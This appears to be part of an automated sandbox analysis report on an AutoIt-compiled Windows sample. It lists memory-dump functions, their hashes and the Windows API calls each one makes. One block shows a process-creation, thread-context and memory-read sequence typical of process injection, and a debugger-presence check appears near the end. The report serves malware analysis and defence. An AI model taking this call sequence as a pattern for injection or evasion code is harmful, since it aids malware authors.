                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: _free$CurrentDirectoryLibraryLoad
                                                              • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                              • API String ID: 2861923089-1757145024
                                                              • Opcode ID: f271635ae2ecbbfa8fb4025f4a27c04a5d3fd778de0ec6d863dc8baba0482f5f
                                                              • Instruction ID: ef68e2b65ce0ec282e2a10e9958e4f8a0d95d647109acd116d0a23c171513bd3
                                                              • Opcode Fuzzy Hash: f271635ae2ecbbfa8fb4025f4a27c04a5d3fd778de0ec6d863dc8baba0482f5f
                                                              • Instruction Fuzzy Hash: 54916D71D042199FCF04EFA4CC919EDBBB8FF14320F14442AF815AB2A1DB79AA55EB50
                                                              APIs
                                                              • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00F135A1,SwapMouseButtons,00000004,?), ref: 00F135D4
                                                              • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00F135A1,SwapMouseButtons,00000004,?,?,?,?,00F12754), ref: 00F135F5
                                                              • RegCloseKey.KERNELBASE(00000000,?,?,00F135A1,SwapMouseButtons,00000004,?,?,?,?,00F12754), ref: 00F13617
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: CloseOpenQueryValue
                                                              • String ID: Control Panel\Mouse
                                                              • API String ID: 3677997916-824357125
                                                              • Opcode ID: 0d642ef6dbe26c06a1797df464e1ff1fa23227450621d4e47e34a3a7349a9799
                                                              • Instruction ID: 59232295f67e90cb9b28a3f0c61182aed8be911502d684ada450c952f4135933
                                                              • Opcode Fuzzy Hash: 0d642ef6dbe26c06a1797df464e1ff1fa23227450621d4e47e34a3a7349a9799
                                                              • Instruction Fuzzy Hash: 1A112A75A11218BFDB208F64DC84EEEBBBCEF44750F11456AF805D7210D6719F94A760
                                                              APIs
                                                              • CreateProcessW.KERNELBASE(?,00000000), ref: 017A7D9B
                                                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 017A7E31
                                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 017A7E53
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2129210722.00000000017A6000.00000040.00000020.00020000.00000000.sdmp, Offset: 017A6000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_17a6000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                              • String ID:
                                                              • API String ID: 2438371351-0
                                                              • Opcode ID: b6a4c29ec9195df02a43fc4b15474606dfbde67be6cfae9816a363b0bdbc2b3f
                                                              • Instruction ID: cb050f8d0d1ae92c2eddb691c209ddaeab5c18ce71c45f07710e9e2fe35eb289
                                                              • Opcode Fuzzy Hash: b6a4c29ec9195df02a43fc4b15474606dfbde67be6cfae9816a363b0bdbc2b3f
                                                              • Instruction Fuzzy Hash: 91621E30A14218DBEB24CF64C840BDEB375EF98300F5091A9D20DEB394E7769E81CB59
                                                              APIs
                                                                • Part of subcall function 00F14EE5: _fseek.LIBCMT ref: 00F14EFD
                                                                • Part of subcall function 00F79734: _wcscmp.LIBCMT ref: 00F79824
                                                                • Part of subcall function 00F79734: _wcscmp.LIBCMT ref: 00F79837
                                                              • _free.LIBCMT ref: 00F796A2
                                                              • _free.LIBCMT ref: 00F796A9
                                                              • _free.LIBCMT ref: 00F79714
                                                                • Part of subcall function 00F32D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00F39A24), ref: 00F32D69
                                                                • Part of subcall function 00F32D55: GetLastError.KERNEL32(00000000,?,00F39A24), ref: 00F32D7B
                                                              • _free.LIBCMT ref: 00F7971C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                              • String ID:
                                                              • API String ID: 1552873950-0
                                                              • Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                              • Instruction ID: db9dbb9baf19eeefdd4d67015b41da8965ddc27df5add5d677159d0c19f020de
                                                              • Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                              • Instruction Fuzzy Hash: C2516CB1D04258AFDF249F64CC81AAEBBB9EF88310F10449EF60DA3241DB755A81DF59
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                              • String ID:
                                                              • API String ID: 2782032738-0
                                                              • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                              • Instruction ID: 45a49a480d3734bfa27a955129dd91a3613707dfd435b130d7ba831c94f0dc27
                                                              • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                              • Instruction Fuzzy Hash: 6E41C375E007469BDF28CE69C8809AE7BA5EF42370F24817DE815C7680DB74FD81AB40
                                                              APIs
                                                              • _memset.LIBCMT ref: 00F4EA39
                                                              • GetOpenFileNameW.COMDLG32(?), ref: 00F4EA83
                                                                • Part of subcall function 00F14750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F14743,?,?,00F137AE,?), ref: 00F14770
                                                                • Part of subcall function 00F30791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00F307B0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Name$Path$FileFullLongOpen_memset
                                                              • String ID: X
                                                              • API String ID: 3777226403-3081909835
                                                              • Opcode ID: a1e872dc62203f75c8bee0df8e9572dfbe7a9654496024f581ac72b8ca0f4fe2
                                                              • Instruction ID: 86c7b1e37c9e706a0c6153bea6c00ef57db46e6bdad90fedab648173fc521b67
                                                              • Opcode Fuzzy Hash: a1e872dc62203f75c8bee0df8e9572dfbe7a9654496024f581ac72b8ca0f4fe2
                                                              • Instruction Fuzzy Hash: E521A871A042989BCF41DF94DC45BEE7BF9AF49714F00405AE808EB241DFB85989EFA1
                                                              APIs
                                                              • GetTempPathW.KERNEL32(00000104,?), ref: 00F798F8
                                                              • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00F7990F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Temp$FileNamePath
                                                              • String ID: aut
                                                              • API String ID: 3285503233-3010740371
                                                              • Opcode ID: 5f74d5309ad4776224dcf7b42072bce21d4d2276ea5b66fb85a53c9a541ab214
                                                              • Instruction ID: 82acf05de158a52514407eb62dd1d93d780a7f908aaba8cf69312d725acced89
                                                              • Opcode Fuzzy Hash: 5f74d5309ad4776224dcf7b42072bce21d4d2276ea5b66fb85a53c9a541ab214
                                                              • Instruction Fuzzy Hash: 15D05E7958030DABDB509BA0DC0EF9A773CE704700F0002B2BA54D10A1EAB195999B91
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 97bf9c63d9293e74b0d478a42a17871a09858cd943f4c5be5d3cbbc305cfab3d
                                                              • Instruction ID: 8e37c7788a1c629917a7b1f0b65a7597fca972eefdac544c0d938c40f27bd12b
                                                              • Opcode Fuzzy Hash: 97bf9c63d9293e74b0d478a42a17871a09858cd943f4c5be5d3cbbc305cfab3d
                                                              • Instruction Fuzzy Hash: 3FF15F71A083009FC714EF28C880AAABBE5FF88314F54892EF99997351D774E945DF92
                                                              APIs
                                                                • Part of subcall function 00F30162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00F30193
                                                                • Part of subcall function 00F30162: MapVirtualKeyW.USER32(00000010,00000000), ref: 00F3019B
                                                                • Part of subcall function 00F30162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00F301A6
                                                                • Part of subcall function 00F30162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00F301B1
                                                                • Part of subcall function 00F30162: MapVirtualKeyW.USER32(00000011,00000000), ref: 00F301B9
                                                                • Part of subcall function 00F30162: MapVirtualKeyW.USER32(00000012,00000000), ref: 00F301C1
                                                                • Part of subcall function 00F260F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00F1F930), ref: 00F26154
                                                              • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00F1F9CD
                                                              • OleInitialize.OLE32(00000000), ref: 00F1FA4A
                                                              • CloseHandle.KERNEL32(00000000), ref: 00F545C8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                              • String ID:
                                                              • API String ID: 1986988660-0
                                                              • Opcode ID: 13d29186a0a1fc1df017831fa5e752897a9f3f233c662d71fa91aefa644fb3d9
                                                              • Instruction ID: 9ea54a9a90a5a49023d3e3091f0f185f4027889126064367107f4d189da712f1
                                                              • Opcode Fuzzy Hash: 13d29186a0a1fc1df017831fa5e752897a9f3f233c662d71fa91aefa644fb3d9
                                                              • Instruction Fuzzy Hash: 0081B0B0902A48CFC784EF39AD606597BE7FB4AB06764812BD018CB362E7744485FF12
                                                              APIs
                                                              • _memset.LIBCMT ref: 00F14370
                                                              • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00F14415
                                                              • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00F14432
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: IconNotifyShell_$_memset
                                                              • String ID:
                                                              • API String ID: 1505330794-0
                                                              • Opcode ID: 8c33ab4b48e2fb60ecf503da3ad30afda8b522e14e649f4ab444ef7dea861fbb
                                                              • Instruction ID: 3c5d8727298efe871a7c1072b28f7104b60deb35f0d3c4f20b6ed7741a94115a
                                                              • Opcode Fuzzy Hash: 8c33ab4b48e2fb60ecf503da3ad30afda8b522e14e649f4ab444ef7dea861fbb
                                                              • Instruction Fuzzy Hash: 37318FB09057018FC721DF34D8846DBBBF8FB88719F00092EE59AC6251E771A988EB52
                                                              APIs
                                                              • __FF_MSGBANNER.LIBCMT ref: 00F35733
                                                                • Part of subcall function 00F3A16B: __NMSG_WRITE.LIBCMT ref: 00F3A192
                                                                • Part of subcall function 00F3A16B: __NMSG_WRITE.LIBCMT ref: 00F3A19C
                                                              • __NMSG_WRITE.LIBCMT ref: 00F3573A
                                                                • Part of subcall function 00F3A1C8: GetModuleFileNameW.KERNEL32(00000000,00FD33BA,00000104,?,00000001,00000000), ref: 00F3A25A
                                                                • Part of subcall function 00F3A1C8: ___crtMessageBoxW.LIBCMT ref: 00F3A308
                                                                • Part of subcall function 00F3309F: ___crtCorExitProcess.LIBCMT ref: 00F330A5
                                                                • Part of subcall function 00F3309F: ExitProcess.KERNEL32 ref: 00F330AE
                                                                • Part of subcall function 00F38B28: __getptd_noexit.LIBCMT ref: 00F38B28
                                                              • RtlAllocateHeap.NTDLL(015D0000,00000000,00000001,00000000,?,?,?,00F30DD3,?), ref: 00F3575F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                              • String ID:
                                                              • API String ID: 1372826849-0
                                                              • Opcode ID: ac66ef188ab6830315fe9256b543bf0db3e629f61c91cc7017ba3edd6a558e49
                                                              • Instruction ID: 1390371c6e42b67e574d91a8f86b6603e1d37de81b67e677bb26826b4149b697
                                                              • Opcode Fuzzy Hash: ac66ef188ab6830315fe9256b543bf0db3e629f61c91cc7017ba3edd6a558e49
                                                              • Instruction Fuzzy Hash: 76012432A00B0ADAD6107739EC82B6E77888FC2B72F100536F905DB1D1DEB88C017661
                                                              APIs
                                                              • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00F79548,?,?,?,?,?,00000004), ref: 00F798BB
                                                              • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00F79548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00F798D1
                                                              • CloseHandle.KERNEL32(00000000,?,00F79548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00F798D8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: File$CloseCreateHandleTime
                                                              • String ID:
                                                              • API String ID: 3397143404-0
                                                              • Opcode ID: 6183c4d253c57d6a4a9b86dd887120ed325c414d2a6ec6f901345440c1de828a
                                                              • Instruction ID: c67c75959b9644a3a0ff708b47776ab1d9b6b7397066aca03f8583c9dcae27fb
                                                              • Opcode Fuzzy Hash: 6183c4d253c57d6a4a9b86dd887120ed325c414d2a6ec6f901345440c1de828a
                                                              • Instruction Fuzzy Hash: 1CE08632140218B7D7211B64EC09FCA7B19EB06770F108122FB14A90E087B11555A7D9
                                                              APIs
                                                              • _free.LIBCMT ref: 00F78D1B
                                                                • Part of subcall function 00F32D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00F39A24), ref: 00F32D69
                                                                • Part of subcall function 00F32D55: GetLastError.KERNEL32(00000000,?,00F39A24), ref: 00F32D7B
                                                              • _free.LIBCMT ref: 00F78D2C
                                                              • _free.LIBCMT ref: 00F78D3E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                              • Instruction ID: 4214c19d5ee0057883915c8a4a54484d68c3896bb8dceeeb3cf4175b0da8db79
                                                              • Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                              • Instruction Fuzzy Hash: 31E012B1A4160146CB74A578AD48A9363DC4F583B2B24491EB80DD7186DF68F843A124
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: CALL
                                                              • API String ID: 0-4196123274
                                                              • Opcode ID: 82bbaae15c81e0256918fc930186396420c13200d33f9d20f461c942dd3fd70e
                                                              • Instruction ID: 3e93a7317c794d5bd9b193491bced8b09ced05eb9d7da4055f05f090e194fa47
                                                              • Opcode Fuzzy Hash: 82bbaae15c81e0256918fc930186396420c13200d33f9d20f461c942dd3fd70e
                                                              • Instruction Fuzzy Hash: 82225B71909301DFC724DF14C890BAABBE1BF85314F14895DE89A8B361DB35ED85EB82
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: _memmove
                                                              • String ID: EA06
                                                              • API String ID: 4104443479-3962188686
                                                              • Opcode ID: 3ff9ac23ad90c131d934178d775c8f60d5e1e71e0eaf7fcbe88e4d1c77ad12f8
                                                              • Instruction ID: 73bf3a3aa398c2860a44aa5d6a0e3f288c422d5fa444d6810263387bfd1adb27
                                                              • Opcode Fuzzy Hash: 3ff9ac23ad90c131d934178d775c8f60d5e1e71e0eaf7fcbe88e4d1c77ad12f8
                                                              • Instruction Fuzzy Hash: 70416032E0415857DF119B64EC617FE7FA29BC5310F684479EC82EB282D6247DC4B3A2
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: _memmove
                                                              • String ID:
                                                              • API String ID: 4104443479-0
                                                              • Opcode ID: 75b3ef76dc9c1d7680ff1126038a0b5bca49f3ec50bdc15de679bd26e1e87542
                                                              • Instruction ID: 80be7f12683db2d8dd37cefc5ecf1c7a00bd7767a31ca22e1086721faf58c0c3
                                                              • Opcode Fuzzy Hash: 75b3ef76dc9c1d7680ff1126038a0b5bca49f3ec50bdc15de679bd26e1e87542
                                                              • Instruction Fuzzy Hash: 963189B2604606AFC704DF68C8D1E69B3B5FF44320B158629E51DCB291DF34E950DB90
                                                              APIs
                                                              • IsThemeActive.UXTHEME ref: 00F14834
                                                                • Part of subcall function 00F3336C: __lock.LIBCMT ref: 00F33372
                                                                • Part of subcall function 00F3336C: DecodePointer.KERNEL32(00000001,?,00F14849,00F67C74), ref: 00F3337E
                                                                • Part of subcall function 00F3336C: EncodePointer.KERNEL32(?,?,00F14849,00F67C74), ref: 00F33389
                                                                • Part of subcall function 00F148FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00F14915
                                                                • Part of subcall function 00F148FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00F1492A
                                                                • Part of subcall function 00F13B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00F13B68
                                                                • Part of subcall function 00F13B3A: IsDebuggerPresent.KERNEL32 ref: 00F13B7A
